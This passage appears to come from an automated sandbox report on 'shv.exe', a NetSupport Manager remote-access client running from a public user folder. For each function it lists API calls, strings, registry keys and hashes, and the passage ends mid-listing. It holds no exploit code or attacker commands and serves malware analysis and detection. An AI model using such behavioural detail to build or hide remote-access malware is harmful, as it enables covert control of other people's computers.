                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                        • API String ID: 4186647306-532032230
                                                                                        • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                        • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                        • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                        • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                        Function 1110F2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                        • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                        • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                        • API String ID: 3360349984-1136101629
                                                                                        • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                        • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                        • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                        • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                        Function 11031960 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %s%s%s.bin$016477$_HF$_HW$_SW
                                                                                        • API String ID: 2111968516-419782183
                                                                                        • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                        • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                        • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                        • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                        Function 11102AB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                        • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                        • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                        • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                        • String ID: NSMDesktopWnd
                                                                                        • API String ID: 2669163067-206650970
                                                                                        • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                        • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                        • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                        • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                        Function 1113CC30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                        • KillTimer.USER32(00000000,00007F61,TermUI...), ref: 1113CCB3
                                                                                        • FreeLibrary.KERNEL32(75B40000,?,TermUI...), ref: 1113CD2B
                                                                                        • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeKillLibraryTimer
                                                                                        • String ID: TermUI
                                                                                        • API String ID: 2006562601-4085834059
                                                                                        • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                        • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                        • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                        • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                        Function 11145330 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                        • API String ID: 47109696-3245241687
                                                                                        • Opcode ID: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction ID: 3a61aca8bf2f26e8be4db12f87e0943ca7983303b4b50086f785ef97d0623835
                                                                                        • Opcode Fuzzy Hash: 2e1f21c9ebfd0fdc4230699bf98ebb40bf83fdb687853d653e48f9fb82f12d2f
                                                                                        • Instruction Fuzzy Hash: 56218875E0422A9BE760DB64CD80B9EF7B8EB44708F1042AAD85DF7540E771AD458BB0
                                                                                        Function 111114D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11111430: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                          • Part of subcall function 11111430: __wsplitpath.LIBCMT ref: 11111475
                                                                                          • Part of subcall function 11111430: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                        • GetComputerNameA.KERNEL32(?,?), ref: 11111578
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                        • API String ID: 806825551-1858614750
                                                                                        • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                        • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                        Function 11144200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                          • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                        • ResetEvent.KERNEL32(00000254), ref: 11144269
                                                                                        • SetEvent.KERNEL32(00000254), ref: 1114427F
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                        • String ID: MiniDump
                                                                                        • API String ID: 1494854734-2840755058
                                                                                        • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                        • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                        Function 11146DA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 11146DCF
                                                                                        • wsprintfA.USER32 ref: 11146E06
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                        • API String ID: 1985783259-2296142801
                                                                                        • Opcode ID: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                        • Instruction ID: b1a6c5171231f01418375ac6f2de6c12625a8d09d3611db16d7d0d369645f93a
                                                                                        • Opcode Fuzzy Hash: 74c0a5bdbb0b764e858cc1f7afd52fdb49af151022e5f3ed446820e6430d86d5
                                                                                        • Instruction Fuzzy Hash: FA11A5FAE00128ABC720DB65ED81FAAF77C9B4461DF000565EB19B6141EA35AA05C7A8
                                                                                        Function 1110F420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                          • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                          • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • _memset.LIBCMT ref: 1110F477
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                        • API String ID: 3234921582-2664294811
                                                                                        • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                        • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                        Function 11145AE0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                          • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
